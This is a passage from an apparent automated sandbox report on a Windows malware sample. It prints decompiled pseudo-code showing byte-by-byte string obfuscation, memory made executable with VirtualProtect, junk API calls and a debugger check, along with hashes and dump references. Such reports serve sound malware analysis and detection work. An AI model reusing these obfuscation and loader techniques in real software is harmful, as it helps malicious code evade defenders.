                        • GetLastError.KERNEL32 ref: 00405003
                          • Part of subcall function 0040650A: __wcstoi64.LIBCMT ref: 00406516
                          • Part of subcall function 00406E58: _doexit.LIBCMT ref: 00406E64
                        • GetSystemDefaultLCID.KERNEL32(12652DE7,78838E04,5CF25B83,32A1E7FB,7F832484,723D872F,63BA0C91,03A6C434,3A465D9D,5F80CD7C,23420A38,3720702C,78838E04,3B8C8B6A,723D872F,17F9CBEA), ref: 0040578F
                        • FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004057DE
                        • GetVolumePathNameA.KERNEL32 ref: 00405811
                        • FindFirstChangeNotificationA.KERNEL32(00000000,00000000,00000000), ref: 0040581A
                        • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040582E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00405835
                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00405839
                        • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00405848
                        • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00405850
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00405857
                        • GetVolumeNameForVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 0040585C
                        • FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 00405877
                        • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00405882
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: Volume$AttributesConsoleFileString$FindFoldInfoNameObjectSystem$AliasesAllocCalendarChangeCharacterCodeCreateDefaultEnumErrorFillFirstHandleInformationLastLocalModuleMountNotificationOpenOutputPagesPathPointProfileSectionValueWrite__wcstoi64_doexit
                        • String ID: "c0$'=0$,p 7$2*$4h3?$8B#$:<-@$L*Pv$LJU$Tfd$ceyizevojapaxujekoxago$e$y$fs>$hiwapikijokutopesowayuzali$kernel32.dll$kowax$l34T$lm|4$pawujagobovalewobukalokaw$pudecebubafafelomulawogosu$yeyofatuw layesoxegejepofazugazotigitohoni lohoma$zo@[$zs=A$\?\
                        • API String ID: 4208290323-2628406891
                        • Opcode ID: 8ad0a84b2df7a62a9c3cad82bac0dc34fd026305838057dfef4a45ceb63b4e81
                        • Instruction ID: 529df58616ab68300be14ee8f658e1ad100b7bd3c971a6dbf306249eb7f06e2e
                        • Opcode Fuzzy Hash: 8ad0a84b2df7a62a9c3cad82bac0dc34fd026305838057dfef4a45ceb63b4e81
                        • Instruction Fuzzy Hash: DF3231B5D01228DBCB608FA6D989ADEBBB4FF05304F208199E55ABB610D7304A85CF59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 73 404e1c-404ec5 GetProcAddress VirtualProtect
                        C-Code - Quality: 100%
                        			E00404E1C(void* __ecx) {
                        				long _v8;
                        				long _v12;
                        				int _t8;
                        
                        				 *0x443e58 = 0x56;
                        				 *0x443e59 = 0x69;
                        				 *0x443e5a = 0x72;
                        				 *0x443e5f = 0x50;
                        				 *0x443e65 = 0x74;
                        				 *0x443e66 = 0;
                        				 *0x443e5b = 0x74;
                        				 *0x443e5c = 0x75;
                        				 *0x443e5d = 0x61;
                        				 *0x443e5e = 0x6c;
                        				 *0x443e60 = 0x72;
                        				 *0x443e61 = 0x6f;
                        				 *0x443e62 = 0x74;
                        				 *0x443e63 = 0x65;
                        				 *0x443e64 = 0x63;
                        				 *0x444ee8 = GetProcAddress( *0x444ef4, "msimg32.dll");
                        				_v8 = 0x20;
                        				_v8 = _v8 + 0x20;
                        				_t8 = VirtualProtect( *0x444ef0,  *0x445124, _v8,  &_v12); // executed
                        				return _t8;
                        			}






                        0x00404e2c
                        0x00404e33
                        0x00404e3a
                        0x00404e41
                        0x00404e48
                        0x00404e4f
                        0x00404e56
                        0x00404e5d
                        0x00404e64
                        0x00404e6b
                        0x00404e72
                        0x00404e79
                        0x00404e80
                        0x00404e87
                        0x00404e8e
                        0x00404e9b
                        0x00404ea0
                        0x00404ea7
                        0x00404ebe
                        0x00404ec5

                        APIs
                        • GetProcAddress.KERNEL32(msimg32.dll), ref: 00404E95
                        • VirtualProtect.KERNELBASE(00000020,?), ref: 00404EBE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: AddressProcProtectVirtual
                        • String ID: $msimg32.dll
                        • API String ID: 3759838892-256693350
                        • Opcode ID: 9068d910604020f704c2da449b03b2bf27ea1a38eb9a0000b980d5d3ccc79277
                        • Instruction ID: 1587185f8188751e2cd3c0e61b1e27c15b3bde4f66aaa4f645813d33f4706bef
                        • Opcode Fuzzy Hash: 9068d910604020f704c2da449b03b2bf27ea1a38eb9a0000b980d5d3ccc79277
                        • Instruction Fuzzy Hash: AC118A2950A2C4EEE702CFA8ED087457F956327F4BF6800A89184162B2C3FB1759D739
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 74 40cb55-40cb64 GetEnvironmentStringsW 75 40cb66-40cb69 74->75 76 40cb6a-40cb6d 74->76 77 40cb7d-40cb86 call 40d677 76->77 78 40cb6f-40cb74 76->78 81 40cb8b-40cb90 77->81 78->78 80 40cb76-40cb7b 78->80 80->77 80->78 82 40cb92-40cb9e FreeEnvironmentStringsW 81->82 83 40cb9f-40cbaa call 40b100 81->83 83->82
                        C-Code - Quality: 100%
                        			E0040CB55() {
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				WCHAR* _t1;
                        				void* _t5;
                        				void* _t18;
                        				WCHAR* _t20;
                        
                        				_t1 = GetEnvironmentStringsW();
                        				_t20 = _t1;
                        				if(_t20 != 0) {
                        					if( *_t20 != 0) {
                        						goto L3;
                        						do {
                        							do {
                        								L3:
                        								_t1 =  &(_t1[1]);
                        							} while ( *_t1 != 0);
                        							_t1 =  &(_t1[1]);
                        						} while ( *_t1 != 0);
                        					}
                        					_t13 = _t1 - _t20 + 2;
                        					_t5 = E0040D677(_t1 - _t20 + 2); // executed
                        					_t18 = _t5;
                        					if(_t18 != 0) {
                        						E0040B100(_t13, _t18, _t20, _t18, _t20, _t13);
                        					}
                        					FreeEnvironmentStringsW(_t20);
                        					return _t18;
                        				} else {
                        					return 0;
                        				}
                        			}










                        0x0040cb58
                        0x0040cb5e
                        0x0040cb64
                        0x0040cb6d
                        0x00000000
                        0x0040cb6f
                        0x0040cb6f
                        0x0040cb6f
                        0x0040cb70
                        0x0040cb71
                        0x0040cb77
                        0x0040cb78
                        0x0040cb6f
                        0x0040cb82
                        0x0040cb86
                        0x0040cb8b
                        0x0040cb90
                        0x0040cba2
                        0x0040cba7
                        0x0040cb93
                        0x0040cb9e
                        0x0040cb66
                        0x0040cb69
                        0x0040cb69

                        APIs
                        • GetEnvironmentStringsW.KERNEL32(00000000,00406FD2), ref: 0040CB58
                        • __malloc_crt.LIBCMT ref: 0040CB86
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040CB93
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$Free__malloc_crt
                        • String ID:
                        • API String ID: 237123855-0
                        • Opcode ID: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
                        • Instruction ID: e68d3ad6946e2ebdad21e99f61c40b24010c0b22ff8cb5065c2f402156d26964
                        • Opcode Fuzzy Hash: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
                        • Instruction Fuzzy Hash: CDF0E2369011209ACB2537757C898773238DA8A769312063BF492E3280E63C4C8282AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 86 404b4d-404bac LoadLibraryA
                        C-Code - Quality: 100%
                        			E00404B4D() {
                        				struct HINSTANCE__* _t1;
                        
                        				 *0x443e61 = 0x6c;
                        				 *0x443e5b = 0x6d;
                        				 *0x443e5a = 0x69;
                        				 *0x443e5c = 0x67;
                        				 *0x443e60 = 0x64;
                        				 *0x443e63 = 0;
                        				 *0x443e5d = 0x33;
                        				 *0x443e59 = 0x73;
                        				 *0x443e62 = 0x6c;
                        				 *0x443e5f = 0x2e;
                        				 *0x443e5e = 0x32;
                        				 *0x443e58 = 0x6d; // executed
                        				_t1 = LoadLibraryA("msimg32.dll"); // executed
                        				return _t1;
                        			}




                        0x00404b52
                        0x00404b59
                        0x00404b60
                        0x00404b67
                        0x00404b6e
                        0x00404b75
                        0x00404b7c
                        0x00404b83
                        0x00404b8a
                        0x00404b91
                        0x00404b98
                        0x00404b9f
                        0x00404ba6
                        0x00404bac

                        APIs
                        • LoadLibraryA.KERNELBASE(msimg32.dll,00405896), ref: 00404BA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: msimg32.dll
                        • API String ID: 1029625771-3287713914
                        • Opcode ID: 530e87e77597c5f6ccc4b26306aff4e1f415cd211520bea03832f453a74474b7
                        • Instruction ID: 3f8dc2c680bb792090705773f5b7a8164b3ab3fc8484564f6c23306e0c441638
                        • Opcode Fuzzy Hash: 530e87e77597c5f6ccc4b26306aff4e1f415cd211520bea03832f453a74474b7
                        • Instruction Fuzzy Hash: 2FF0C21854E2C0C9F7028BADA9587153F961363F4BF6844A981D41A6A2C2FB0369D77E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 87 4074c4-4074e6 HeapCreate 88 4074e8-4074e9 87->88 89 4074ea-4074f3 87->89
                        C-Code - Quality: 100%
                        			E004074C4(intOrPtr _a4) {
                        				void* _t6;
                        
                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                        				 *0x443328 = _t6;
                        				if(_t6 != 0) {
                        					 *0x4462bc = 1;
                        					return 1;
                        				} else {
                        					return _t6;
                        				}
                        			}




                        0x004074d9
                        0x004074df
                        0x004074e6
                        0x004074ed
                        0x004074f3
                        0x004074e9
                        0x004074e9
                        0x004074e9

                        APIs
                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004074D9
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: be5df3d05fce8e948e50ee5dcbd3fb50008ebbaf1e7391ca88c6a99a499d4d82
                        • Instruction ID: 794e38612b908fa8ee68bec593ddea28d0b4f84003d2402fdcc480bc19f1ea62
                        • Opcode Fuzzy Hash: be5df3d05fce8e948e50ee5dcbd3fb50008ebbaf1e7391ca88c6a99a499d4d82
                        • Instruction Fuzzy Hash: B7D0A776A54344AFEB109F717D08B723BDCE385BA5F108436F90DC6190F574D680CA09
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 90 40bb1b-40bb1d call 40baa9 92 40bb22-40bb23 90->92
                        C-Code - Quality: 100%
                        			E0040BB1B() {
                        				void* _t1;
                        
                        				_t1 = E0040BAA9(0); // executed
                        				return _t1;
                        			}




                        0x0040bb1d
                        0x0040bb23

                        APIs
                        • __encode_pointer.LIBCMT ref: 0040BB1D
                          • Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000000,?,0040BB22,00000000,0040DAE4,00443488,00000000,00000314,?,004084CB,00443488,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BABB
                          • Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000002,?,0040BB22,00000000,0040DAE4,00443488,00000000,00000314,?,004084CB,00443488,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BAD2
                          • Part of subcall function 0040BAA9: RtlEncodePointer.NTDLL(00000000,?,0040BB22,00000000,0040DAE4,00443488,00000000,00000314,?,004084CB,00443488,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BB10
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: Value$EncodePointer__encode_pointer
                        • String ID:
                        • API String ID: 2585649348-0
                        • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction ID: 7e4224bbe38dc51f274b3f09f605fa0bbf77e352b7c6d7f78f2a44217b079060
                        • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E0040DAC5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                        				intOrPtr _v0;
                        				void* _v804;
                        				intOrPtr _v808;
                        				intOrPtr _v812;
                        				intOrPtr _t6;
                        				intOrPtr _t11;
                        				intOrPtr _t12;
                        				intOrPtr _t13;
                        				long _t17;
                        				intOrPtr _t21;
                        				intOrPtr _t22;
                        				intOrPtr _t25;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				intOrPtr* _t31;
                        				void* _t34;
                        
                        				_t27 = __esi;
                        				_t26 = __edi;
                        				_t25 = __edx;
                        				_t22 = __ecx;
                        				_t21 = __ebx;
                        				_t6 = __eax;
                        				_t34 = _t22 -  *0x4185e8; // 0x1be79bd2
                        				if(_t34 == 0) {
                        					asm("repe ret");
                        				}
                        				 *0x443b68 = _t6;
                        				 *0x443b64 = _t22;
                        				 *0x443b60 = _t25;
                        				 *0x443b5c = _t21;
                        				 *0x443b58 = _t27;
                        				 *0x443b54 = _t26;
                        				 *0x443b80 = ss;
                        				 *0x443b74 = cs;
                        				 *0x443b50 = ds;
                        				 *0x443b4c = es;
                        				 *0x443b48 = fs;
                        				 *0x443b44 = gs;
                        				asm("pushfd");
                        				_pop( *0x443b78);
                        				 *0x443b6c =  *_t31;
                        				 *0x443b70 = _v0;
                        				 *0x443b7c =  &_a4;
                        				 *0x443ab8 = 0x10001;
                        				_t11 =  *0x443b70; // 0x0
                        				 *0x443a6c = _t11;
                        				 *0x443a60 = 0xc0000409;
                        				 *0x443a64 = 1;
                        				_t12 =  *0x4185e8; // 0x1be79bd2
                        				_v812 = _t12;
                        				_t13 =  *0x4185ec; // 0xe418642d
                        				_v808 = _t13;
                        				 *0x443ab0 = IsDebuggerPresent();
                        				_push(1);
                        				E0040FE79(_t14);
                        				SetUnhandledExceptionFilter(0);
                        				_t17 = UnhandledExceptionFilter("`:D");
                        				if( *0x443ab0 == 0) {
                        					_push(1);
                        					E0040FE79(_t17);
                        				}
                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                        			}



















                        0x0040dac5
                        0x0040dac5
                        0x0040dac5
                        0x0040dac5
                        0x0040dac5
                        0x0040dac5
                        0x0040dac5
                        0x0040dacb
                        0x0040dacd
                        0x0040dacd
                        0x004116b8
                        0x004116bd
                        0x004116c3
                        0x004116c9
                        0x004116cf
                        0x004116d5
                        0x004116db
                        0x004116e2
                        0x004116e9
                        0x004116f0
                        0x004116f7
                        0x004116fe
                        0x00411705
                        0x00411706
                        0x0041170f
                        0x00411717
                        0x0041171f
                        0x0041172a
                        0x00411734
                        0x00411739
                        0x0041173e
                        0x00411748
                        0x00411752
                        0x00411757
                        0x0041175d
                        0x00411762
                        0x0041176e
                        0x00411773
                        0x00411775
                        0x0041177d
                        0x00411788
                        0x00411795
                        0x00411797
                        0x00411799
                        0x0041179e
                        0x004117b2

                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 00411768
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041177D
                        • UnhandledExceptionFilter.KERNEL32(`:D), ref: 00411788
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 004117A4
                        • TerminateProcess.KERNEL32(00000000), ref: 004117AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID: `:D
                        • API String ID: 2579439406-3817753026
                        • Opcode ID: 1f96787698ceca79ce6be8ff23c455c1d0647bc5aff1b206045eeea5c090ec17
                        • Instruction ID: bd0eb369943bcf686e2740c49d33ea09c9182c3fa7c6542836c5fb67a2486ebe
                        • Opcode Fuzzy Hash: 1f96787698ceca79ce6be8ff23c455c1d0647bc5aff1b206045eeea5c090ec17
                        • Instruction Fuzzy Hash: FF21C0BC910384EFD710DF69E9457447BA4FB1AB16F10803AE549A36B2E7746A84CF0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040C824() {
                        
                        				SetUnhandledExceptionFilter(E0040C7E2);
                        				return 0;
                        			}



                        0x0040c829
                        0x0040c831

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000C7E2), ref: 0040C829
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
                        • Instruction ID: e2a8f789a288a585d98f9b92902466bf4f7c4288f4264d283a5847212c576c19
                        • Opcode Fuzzy Hash: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
                        • Instruction Fuzzy Hash: 5F900271291142C6C60417715E4A64665985A5C70276145796541E5CA5EB7450406919
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 83%
                        			E00404D37() {
                        				void* _v6;
                        				struct _COORD _v8;
                        				unsigned int _v12;
                        				long _v16;
                        				long _v20;
                        				int _v24;
                        				short _v2072;
                        				char _v4120;
                        				unsigned int _t15;
                        				void* _t16;
                        				intOrPtr _t32;
                        				intOrPtr _t34;
                        
                        				E0040E260(0x1014);
                        				_t34 =  *0x444ef0;
                        				_t15 =  *0x445124 >> 3;
                        				if(_t15 > 0) {
                        					_t32 = _t34;
                        					_v12 = _t15;
                        					do {
                        						if( *0x445124 == 0x959) {
                        							GetProcessWorkingSetSize(0, 0, 0);
                        							_v8 = 0;
                        							asm("stosw");
                        							FillConsoleOutputCharacterA(0, 0, 0, _v8,  &_v24);
                        							WriteConsoleW(0, 0, 0,  &_v16, 0);
                        							LCMapStringW(0, 0, 0, 0,  &_v2072, 0);
                        							LoadLibraryW(L"rijaxosetosezurinurikudeg");
                        							LoadLibraryA(0);
                        							WriteConsoleA(0, 0, 0,  &_v20, 0);
                        							__imp__GetConsoleAliasesW( &_v4120, 0, 0);
                        							GetFileInformationByHandle(0, 0);
                        						}
                        						_t16 = E00404BB7(0, _t32);
                        						_t32 = _t32 + 8;
                        						_t10 =  &_v12;
                        						 *_t10 = _v12 - 1;
                        					} while ( *_t10 != 0);
                        					return _t16;
                        				}
                        				return _t15;
                        			}















                        0x00404d3f
                        0x00404d49
                        0x00404d50
                        0x00404d57
                        0x00404d5f
                        0x00404d61
                        0x00404d64
                        0x00404d6e
                        0x00404d73
                        0x00404d7b
                        0x00404d82
                        0x00404d8e
                        0x00404d9c
                        0x00404dae
                        0x00404db9
                        0x00404dc0
                        0x00404dce
                        0x00404ddd
                        0x00404de5
                        0x00404de5
                        0x00404dec
                        0x00404df1
                        0x00404df4
                        0x00404df4
                        0x00404df4
                        0x00000000
                        0x00404dfe
                        0x00404e01

                        APIs
                        • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00404D73
                        • FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404D8E
                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D9C
                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00404DAE
                        • LoadLibraryW.KERNEL32(rijaxosetosezurinurikudeg), ref: 00404DB9
                        • LoadLibraryA.KERNEL32(00000000), ref: 00404DC0
                        • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404DCE
                        • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00404DDD
                        • GetFileInformationByHandle.KERNEL32(00000000,00000000), ref: 00404DE5
                        Strings
                        • rijaxosetosezurinurikudeg, xrefs: 00404DB4
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: Console$LibraryLoadWrite$AliasesCharacterFileFillHandleInformationOutputProcessSizeStringWorking
                        • String ID: rijaxosetosezurinurikudeg
                        • API String ID: 2068669440-2185336016
                        • Opcode ID: c680141fb48d403449c29a146cf973a2c8ebdcfe77a9ba113d80c8843669c7fe
                        • Instruction ID: e64544e4f6dd4bf280d38f8b5048b3047c19ba0bed3220dd0aa734f01ce6396b
                        • Opcode Fuzzy Hash: c680141fb48d403449c29a146cf973a2c8ebdcfe77a9ba113d80c8843669c7fe
                        • Instruction Fuzzy Hash: 83112E76802528BBD7219BA1EE48DDF7FBCEF4A3517000066F645F2160C6745641CBF9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E0040B5C9(signed int __edx, char _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t59;
                        				intOrPtr* _t61;
                        				signed int _t63;
                        				void* _t68;
                        				signed int _t69;
                        				signed int _t72;
                        				signed int _t74;
                        				signed int _t75;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				signed int _t82;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t99;
                        				intOrPtr* _t100;
                        				void* _t101;
                        
                        				_t90 = __edx;
                        				if(_a8 == 0 || _a12 == 0) {
                        					L4:
                        					return 0;
                        				} else {
                        					_t100 = _a16;
                        					if(_t100 != 0) {
                        						_t4 =  &_a4; // 0x405f77
                        						_t82 =  *_t4;
                        						__eflags = _t82;
                        						if(_t82 == 0) {
                        							goto L3;
                        						}
                        						_t63 = _t59 | 0xffffffff;
                        						_t90 = _t63 % _a8;
                        						__eflags = _a12 - _t63 / _a8;
                        						if(_a12 > _t63 / _a8) {
                        							goto L3;
                        						}
                        						_t97 = _a8 * _a12;
                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
